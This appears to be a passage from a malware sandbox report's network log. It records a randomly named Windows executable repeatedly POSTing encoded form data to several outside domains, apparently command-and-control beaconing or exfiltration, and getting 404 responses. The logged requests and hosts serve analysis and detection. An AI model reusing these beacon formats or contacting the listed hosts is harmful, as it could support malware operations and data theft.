JNx8tTw=T+OrNDuFhsdGxarnBR24TH0G1yGegvPkwWRIQQ8zICLA0xkQknRqU8rGJCu9UX9kexqFy6SqTY3QhPpqd42Smjv/n4zbnmkvXliWwhY2o4c8xps2yOYom/Eoj1peOdbf1lGdgwE/gccpajXgFcp2pwApLaURD75wPPTFkpzaEO9q8GQJHsy8XNfix8h8gMn2EU4rZCiJis+BxHvvec2tXh13etQS
Jul 26, 2024 09:41:34.500504971 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:34 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6679219a-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49722	38.181.21.136	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:36.223187923 CEST	1795	OUT	POST /uum0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.yp78w.top Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.yp78w.top Referer: http://www.yp78w.top/uum0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 54 2b 4f 72 4e 44 75 46 68 73 64 47 78 61 72 6e 42 52 32 34 54 48 30 47 31 79 47 65 67 76 50 6b 77 57 52 49 51 51 38 7a 49 43 54 41 30 44 73 51 32 45 35 71 56 38 72 47 58 79 75 38 55 58 39 44 65 78 79 42 79 36 57 51 54 65 7a 51 6e 74 68 71 57 70 32 53 39 7a 76 2f 36 6f 7a 67 35 57 6b 32 58 6c 79 4a 77 68 6f 32 6f 34 63 38 78 76 67 32 31 63 38 6f 39 2f 45 76 6d 46 70 43 63 74 62 6b 31 6c 50 71 67 77 51 42 67 4b 73 70 5a 41 76 67 41 70 39 32 72 51 41 52 4d 61 56 43 44 37 6c 72 50 50 65 2b 6b 70 75 2f 45 4f 46 71 35 48 38 51 43 4d 4f 6a 42 62 48 76 32 39 6c 50 77 4a 76 4b 48 43 6f 36 53 6a 61 34 2f 4f 75 69 6d 48 50 54 65 49 37 33 42 56 31 77 55 59 4a 35 6e 71 55 68 68 70 35 76 44 37 31 6c 53 6f 78 67 32 73 35 57 6f 4f 32 6d 62 38 52 62 48 4d 70 57 56 59 4e 50 38 56 55 62 4c 71 47 51 51 42 48 54 32 2b 51 72 66 77 2b 49 2b 54 51 54 74 6b 65 31 70 79 6d 41 78 4e 4f 78 50 4b 36 70 6f 61 45 39 65 76 36 4c 32 49 34 36 4a 48 7a 76 4d 77 68 6a 32 70 4a 74 51 76 6b 47 79 50 55 71 51 31 [TRUNCATED] Data Ascii: JNx8tTw=T+OrNDuFhsdGxarnBR24TH0G1yGegvPkwWRIQQ8zICTA0DsQ2E5qV8rGXyu8UX9DexyBy6WQTezQnthqWp2S9zv/6ozg5Wk2XlyJwho2o4c8xvg21c8o9/EvmFpCctbk1lPqgwQBgKspZAvgAp92rQARMaVCD7lrPPe+kpu/EOFq5H8QCMOjBbHv29lPwJvKHCo6Sja4/OuimHPTeI73BV1wUYJ5nqUhhp5vD71lSoxg2s5WoO2mb8RbHMpWVYNP8VUbLqGQQBHT2+Qrfw+I+TQTtke1pymAxNOxPK6poaE9ev6L2I46JHzvMwhj2pJtQvkGyPUqQ1qX1HlgL4Ogx3P9SXrpA9Wy2bc1WkQAT7aPff7aR/BK5e1UXlppoSP/EypM6RehXoKtb/F5bMrTCSUAQnVc8Xw7/nheT8zIhDD+63htHoV/UbsM81DrzZJMYIq6XTYhaRqll17jOP1+ABq5ANOO4w5wkGkivMKRWpT3hwNg83I5UVwqWSmdHCukuPP4wwR6pghflWCFcHdXO2utQ3813rFV/E6jA1LKH2MXbJDreh5D21MA//xIT+YmFh4zSoFosRF3J/VDTrK94pjwGtFaWUfFT2sLOngiRwuGlHcjKH2YJd1aaoDMPG886ylefuOpszXiaOnV0aDpv+4PMAT0mZ8LaifxkmRg6mm50MDKKEFBVm10i19w2v6SA0DvKIHA2rkJS9ZgY03GcsjfOa/5dPXPuRC3ooqj08769c68Im0zhkrpIN+UeqePLd8q+0e2IEICFYiK1V1BoCgrwZf/VV0iZOy3HzvWdRZS1wztGVo/Ix5Hm2u++T6jjnUMeRbXF80+m/MTuhxlu+SS690eYTxB1p+wtYt80WrJqFGUiKcexYNoBY5SErqbKktFes8GsPJ4u1B4v2lQaIz1oOwlUbzOf/fifkcsYkEVY5+dLXUa9hpfAtSgGpk7Lu+ONxwdUbwZZqmHnH/mM3itH8TDin5dlFPzpopy+Urw [TRUNCATED]
Jul 26, 2024 09:41:37.119168997 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:36 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6679219a-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49723	38.181.21.136	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:38.839445114 CEST	505	OUT	GET /uum0/?F0a=DDvTXr_Hk&JNx8tTw=e8mLO0vfs8Y3qrjnXCuwWWFpxRqUwvXg5R5zTwg0dxPA0D0+2y5XZdX7Jiy5LTJObhiw6tiNBJ2tuOImZYLd7CSBsL3AjEU0bE2Rvh0Rs/xCr/kZro4Zx80LlhBtIK+G2g== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.yp78w.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:41:39.781392097 CEST	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:39 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "6679219a-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	47.238.77.168	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:45.325150013 CEST	773	OUT	POST /ggr3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.gzlxdj1921.com Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.gzlxdj1921.com Referer: http://www.gzlxdj1921.com/ggr3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 7a 73 4e 71 75 48 4c 69 4f 2f 67 66 6d 76 67 6e 56 36 49 45 76 69 4c 7a 73 68 42 64 6d 58 72 73 69 52 48 38 53 56 70 53 70 6d 68 6b 45 58 41 48 30 64 64 43 49 6f 30 72 65 4c 72 4d 67 56 43 33 7a 46 36 33 4b 70 4d 36 59 72 6a 44 43 43 6a 30 72 55 64 52 4d 4c 33 2b 4b 54 4c 36 45 78 33 62 62 2f 51 4a 2b 59 6d 57 6e 49 34 4d 41 4b 48 53 42 4a 63 37 41 52 79 71 66 63 73 6c 64 75 2f 45 46 6f 4a 6b 49 45 6a 79 57 4f 2f 4e 45 73 69 63 4a 67 70 51 65 6d 35 47 6b 31 72 69 66 6d 6b 7a 47 46 4e 72 33 6f 65 55 6f 62 31 6b 68 55 50 6c 74 54 5a 35 75 34 38 65 31 4f 4b 6a 67 6a 63 43 69 6f 56 75 2f 59 38 3d Data Ascii: JNx8tTw=zsNquHLiO/gfmvgnV6IEviLzshBdmXrsiRH8SVpSpmhkEXAH0ddCIo0reLrMgVC3zF63KpM6YrjDCCj0rUdRML3+KTL6Ex3bb/QJ+YmWnI4MAKHSBJc7ARyqfcsldu/EFoJkIEjyWO/NEsicJgpQem5Gk1rifmkzGFNr3oeUob1khUPltTZ5u48e1OKjgjcCioVu/Y8=
Jul 26, 2024 09:41:46.214287043 CEST	732	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 72 94 40 10 be f3 14 2d 7b d1 03 bb 80 24 ae 84 70 f1 e7 a8 39 a4 b4 3c 36 4c b3 50 01 06 67 86 8d ab 65 55 ca 93 be 83 1e f4 e8 c9 8b 57 5f c6 32 55 79 0b 87 30 c9 2e bb 54 e2 c1 39 0c 4c 7f dd fd 35 5f 4f 13 dd 79 fc fc d1 f1 ab a3 27 90 ab aa 8c ad e8 ea 41 c8 62 0b f4 8a 2a 52 08 69 8e 42 92 3a b4 5b 95 39 73 1b 66 06 54 85 2a 29 7e c6 15 3c e5 6d cd e0 ee 24 70 83 7b d1 ac b7 5b bd 93 54 ab ee 00 66 25 9c ad e0 dd f5 b1 5b 19 af 55 08 35 17 15 96 f0 b0 51 60 bf 20 c1 b0 46 fb 60 e0 97 f2 92 8b 10 26 ae eb 0e 81 04 d3 93 85 e8 4a d0 68 96 65 6b f4 bd 75 fd 9a 7b 37 d1 7a f3 db 79 b3 6d de 0a c5 a2 a8 9d 84 2b c5 ab 10 a6 7b 54 8d 53 fb 37 52 07 b7 53 cf 5d 77 e7 ab ff 99 fd fe 28 7b c2 4b 06 9e 37 ce bd 11 de fc cf 6e 6d e4 9d 2e 49 c8 82 d7 5b e9 4d d8 42 e0 ea 60 87 d7 91 c5 5b 0a 41 f7 6a eb 02 70 c1 48 38 8a 37 21 78 cd 1b 90 bc 2c 18 4c 10 71 e8 d7 20 63 45 bd 30 8e 9b 7a 8d 08 ea 0d f5 ec f6 68 66 6e 73 34 eb 67 c4 8a ba fb 6c c6 21 f7 [TRUNCATED] Data Ascii: 1fcTr@-{$p9<6LPgeUW_2Uy0.T9L5_Oy'AbRiB:[9sfT)~<m$p{[Tf%[U5Q` F`&Jheku{7zym+{TS7RS]w({K7nm.I[MB`[AjpH87!x,Lq cE0zhfns4gl!FfA_^\|v_>}A%4m yQ($!F+%f$ZEE}"X.+Po;5+(mk\|^:*7jq.G/0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49725	47.238.77.168	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:47.924129963 CEST	793	OUT	POST /ggr3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.gzlxdj1921.com Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.gzlxdj1921.com Referer: http://www.gzlxdj1921.com/ggr3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 7a 73 4e 71 75 48 4c 69 4f 2f 67 66 6e 50 77 6e 58 62 49 45 6e 69 4c 79 77 52 42 64 78 48 72 53 69 52 62 38 53 52 34 4e 6f 54 78 6b 45 31 59 48 33 59 70 43 4e 6f 30 72 55 72 72 4a 74 31 43 67 7a 46 33 49 4b 70 41 36 59 72 6e 44 43 44 54 30 72 69 56 65 65 72 33 38 4d 54 4c 72 4c 52 33 62 62 2f 51 4a 2b 62 61 77 6e 4f 51 4d 44 35 66 53 41 6f 63 30 44 52 79 74 57 38 73 6c 4b 2b 2f 49 46 6f 49 7a 49 46 2b 6c 57 4c 37 4e 45 6f 6d 63 4a 55 64 54 58 6d 35 49 36 46 71 47 56 45 5a 35 4b 30 56 44 2f 4a 62 2b 35 49 46 76 6b 69 69 50 33 78 52 52 39 59 51 6d 6c 64 43 55 78 54 39 72 34 4c 46 65 68 50 71 71 63 32 39 53 52 6e 77 69 32 55 73 33 57 7a 35 53 75 6a 32 37 Data Ascii: JNx8tTw=zsNquHLiO/gfnPwnXbIEniLywRBdxHrSiRb8SR4NoTxkE1YH3YpCNo0rUrrJt1CgzF3IKpA6YrnDCDT0riVeer38MTLrLR3bb/QJ+bawnOQMD5fSAoc0DRytW8slK+/IFoIzIF+lWL7NEomcJUdTXm5I6FqGVEZ5K0VD/Jb+5IFvkiiP3xRR9YQmldCUxT9r4LFehPqqc29SRnwi2Us3Wz5Suj27
Jul 26, 2024 09:41:48.859035015 CEST	732	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 72 94 40 10 be f3 14 2d 7b d1 03 bb 80 44 57 42 b8 f8 73 d4 1c 52 b1 3c 36 4c b3 50 01 06 67 86 8d ab 65 95 e5 49 df 41 0f f1 e8 c9 8b 57 5f c6 32 55 79 0b 87 30 c9 2e bb 54 e2 c1 39 0c 4c 7f dd fd 35 5f 4f 13 dd 79 f2 e2 f1 d1 ab c3 a7 90 ab aa 8c ad e8 ea 41 c8 62 0b f4 8a 2a 52 08 69 8e 42 92 3a b0 5b 95 39 73 1b 66 06 54 85 2a 29 7e ce 15 3c e3 6d cd e0 ee 24 70 83 7b d1 ac b7 5b bd 93 54 ab ee 00 66 25 9c ad e0 dd f5 b1 5b 19 af 55 08 35 17 15 96 f0 a8 51 60 1f 93 60 58 a3 bd 3f f0 4b 79 c9 45 08 13 d7 75 87 40 82 e9 c9 42 74 25 68 34 cb b2 35 fa de ba 7e cd bd 9b 68 bd f9 ed bc d9 36 6f 85 62 51 d4 4e c2 95 e2 55 08 d3 3d aa c6 a9 fd 1b a9 83 db a9 e7 ae bb f3 d5 ff cc 7e 7f 94 3d e1 25 03 cf 1b e7 de 08 6f fe 67 b7 36 f2 4e 97 24 64 c1 eb ad f4 26 6c 21 70 b5 bf c3 eb c8 e2 2d 85 a0 7b b5 75 01 b8 60 24 1c c5 9b 10 bc e6 0d 48 5e 16 0c 26 88 38 f4 6b 90 b1 a2 5e 18 c7 4d bd 46 04 f5 86 7a 76 7b 34 33 b7 39 9a f5 33 62 45 dd 7d 36 e3 90 7b [TRUNCATED] Data Ascii: 1fcTr@-{DWBsR<6LPgeIAW_2Uy0.T9L5_OyAbRiB:[9sfT)~<m$p{[Tf%[U5Q``X?KyEu@Bt%h45~h6obQNU=~=%og6N$d&l!p-{u`$H^&8k^MFzv{4393bE}6{#_~O?~qzFrLxB(_RNQB#xJRoozTSSuqXJrS"bu>vmW,LuiQKHK6d^hz{Q80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49726	47.238.77.168	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:50.523245096 CEST	1810	OUT	POST /ggr3/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.gzlxdj1921.com Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.gzlxdj1921.com Referer: http://www.gzlxdj1921.com/ggr3/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 7a 73 4e 71 75 48 4c 69 4f 2f 67 66 6e 50 77 6e 58 62 49 45 6e 69 4c 79 77 52 42 64 78 48 72 53 69 52 62 38 53 52 34 4e 6f 54 35 6b 45 47 51 48 31 2f 31 43 4f 6f 30 72 59 4c 72 49 74 31 43 59 7a 46 75 42 4b 70 64 42 59 70 50 44 43 67 62 30 74 58 31 65 48 62 33 38 4f 54 4c 37 45 78 33 30 62 38 34 56 2b 59 79 77 6e 4f 51 4d 44 37 72 53 57 4a 63 30 50 78 79 71 66 63 73 70 64 75 2f 6b 46 6f 41 6a 49 46 36 31 57 66 50 4e 45 49 32 63 50 78 70 54 4b 57 35 4b 37 46 71 65 56 45 56 36 4b 30 35 70 2f 4a 2b 52 35 49 39 76 6d 44 50 4c 71 31 68 6c 76 72 41 77 6d 39 4b 59 76 47 64 32 35 74 38 72 6f 76 2b 31 41 58 74 41 66 7a 56 36 30 56 5a 65 48 31 74 4b 6d 55 2f 54 75 72 67 67 37 66 4a 43 70 41 53 32 78 59 5a 53 4e 52 79 4f 53 34 68 68 32 58 4e 58 77 30 34 37 68 6c 79 4f 79 33 4d 2f 69 51 61 57 77 58 55 42 36 54 45 64 61 54 75 6f 49 72 5a 58 5a 6c 39 54 44 37 34 64 6c 42 32 66 6b 2b 4b 31 73 75 68 42 74 45 4d 44 61 4f 39 46 74 73 47 46 76 34 74 32 44 30 38 72 37 32 52 55 6d 69 2f 73 74 2b [TRUNCATED] Data Ascii: JNx8tTw=zsNquHLiO/gfnPwnXbIEniLywRBdxHrSiRb8SR4NoT5kEGQH1/1COo0rYLrIt1CYzFuBKpdBYpPDCgb0tX1eHb38OTL7Ex30b84V+YywnOQMD7rSWJc0Pxyqfcspdu/kFoAjIF61WfPNEI2cPxpTKW5K7FqeVEV6K05p/J+R5I9vmDPLq1hlvrAwm9KYvGd25t8rov+1AXtAfzV60VZeH1tKmU/Turgg7fJCpAS2xYZSNRyOS4hh2XNXw047hlyOy3M/iQaWwXUB6TEdaTuoIrZXZl9TD74dlB2fk+K1suhBtEMDaO9FtsGFv4t2D08r72RUmi/st+/uaHhVlwirF2InzYS1ScP/coXjg2PhQkYQVOsXezRJKLX62ZwitdD44Rfi2IuDejApaTWlRRhr1SpuQUvH6EX/VhFQNK7LC0jjbHPvhy7BSs7w/5RWpsMDmb+mI931hOExYpctRcNv8EAVfTEM4OBsLCStLFUNGlChKBTz48p9k1hGPNd5IgpN6ygWcEOE2O6qji/ryMNSjlGFLPRz20utOA6p3eO6dCzYXVu+yjOw2mIqE0rHuihgGZldOodfJVtFjnWue0ySUdj2KMnxedGx4Tdd8Y+RWJGlHpR+G6XSKlAv6nnZQhtJll4j7OiC7kotJxJYKEAb2TF/e3Nr1HBrpZ7lNvp0lqi6uvCuqoNLrgALy1DGWlSaSxxCIkjka1rHK4KnJQj0tRvasziogCG2aNcR3k+99e9NG6Q0buaJ7i0EH1N/xiixyYgAbB4+X64LY5hy9Ba93xLeqD7DuIJcbkT3lUkyo7DfYha+jVqbUcBfNGx+HcIr+nUD60rHbfOPzB9qs+RWjXjyGi0Ev4AWs4bPhd38piYo00o2X7n9/xCKKenu9EiVHRcwmrK426iqKkOvXjaC+kh5WiBU+YoPTM3pJ7RsqD9Xe8PJEtDa91L3XcZ6jp4kxSsVZ9uIx/3JPawiPea7OkI0XnbLiUV+ppFYqqMHHI+3 [TRUNCATED]
Jul 26, 2024 09:41:51.714416027 CEST	732	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 bd 72 d4 30 10 ee fd 14 8b af 81 c2 77 96 f1 c1 e1 38 6e f8 29 21 45 06 86 52 b6 d6 67 4d 6c cb 48 f2 85 83 61 86 a1 82 77 80 02 4a 2a 1a 5a 5e 86 21 33 79 0b e4 58 c9 9d ef 3c 09 05 2a 64 6b bf dd fd d6 df 6a 1d df 7a f4 ec e1 f1 cb a3 c7 50 e8 aa 4c 9c f8 f2 81 94 25 0e 98 15 57 a8 29 64 05 95 0a f5 a1 db ea dc 5b b8 30 b3 a0 e6 ba c4 e4 a9 d0 f0 44 b4 35 83 db 93 d0 0f ef c4 b3 de ee f4 4e 4a af bb 03 d8 95 0a b6 86 b7 57 c7 6e e5 a2 d6 11 d4 42 56 b4 84 07 8d 06 f7 39 4a 46 6b ea 1e 0c fc 32 51 0a 19 c1 c4 f7 fd 21 90 d2 ec 64 29 bb 12 0c 9a e7 f9 06 7d e7 5c bd 16 e4 3a 5a b2 b8 99 37 df e5 ad a8 5c f2 da 4b 85 d6 a2 8a 60 3a c7 6a 9c 3a b8 96 3a bc 99 7a e1 fb 7b 5f fd cf ec 77 47 d9 53 51 32 20 64 9c 7b 2b bc f9 9f dd da ca 3b 5d a1 54 5c d4 3b e9 6d d8 52 d2 f5 c1 1e af a7 f8 1b 8c c0 f4 6a e7 02 08 c9 50 7a 5a 34 11 90 e6 35 28 51 72 06 13 4a e9 d0 af a1 8c f1 7a 69 1d b7 f5 1a 11 94 0c f5 ec f6 78 66 6f 73 3c eb 67 c4 89 bb fb 6c c7 a1 20 [TRUNCATED] Data Ascii: 1fcTr0w8n)!ERgMlHawJZ^!3yX<dkjzPL%W)d[0D5NJWnBV9JFk2Q!d)}\:Z7\K`:j::z{_wGSQ2 d{+;]T\;mRjPzZ45(QrJzixfos<gl #`?\|;?~4+RHYJN^"hJ!Re UJOm>QT4ykEddjJ5~_AVR]XwCAyhNhz{Q8g@0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49727	47.238.77.168	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:41:53.216720104 CEST	510	OUT	GET /ggr3/?JNx8tTw=+ulKtzjhC/pF9uoDIL96mS+Q2gVwjVfYnGC5dhxw+14/MHoXjYhMFpwJCtX2zxSL+1u8Kqx4aLSiOAPYuX8wC92mPQi5Iz3Ed95V/6CV65glQfCAW8c6AwGpbOMtcs+eTg==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.gzlxdj1921.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:41:54.129388094 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Jul 2024 07:41:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 34 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 38 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d [TRUNCATED] Data Ascii: 4ab<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 { font: normal 18pt "Verdana"; color: #f00; margin-bottom: .5em; } h2 { font: normal 14pt "Verdana"; color: #800000; margin-bottom: .5em; } h3 { font: bold 11pt "Verdana"; } p { font: normal 9pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head><body> <h1>Not Found (#404)</h1> <h2></h2> <p> The above error occurred while the Web server was processing your request. </p> [TRUNCATED]
Jul 26, 2024 09:41:54.129673004 CEST	159	IN	Data Raw: 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 73 69 6f 6e 22 3e 0a 20 20 20 20 Data Ascii: u think this is a server error. Thank you. </p> <div class="version"> 2024-07-26 15:41:53 </div> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49728	3.33.130.190	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
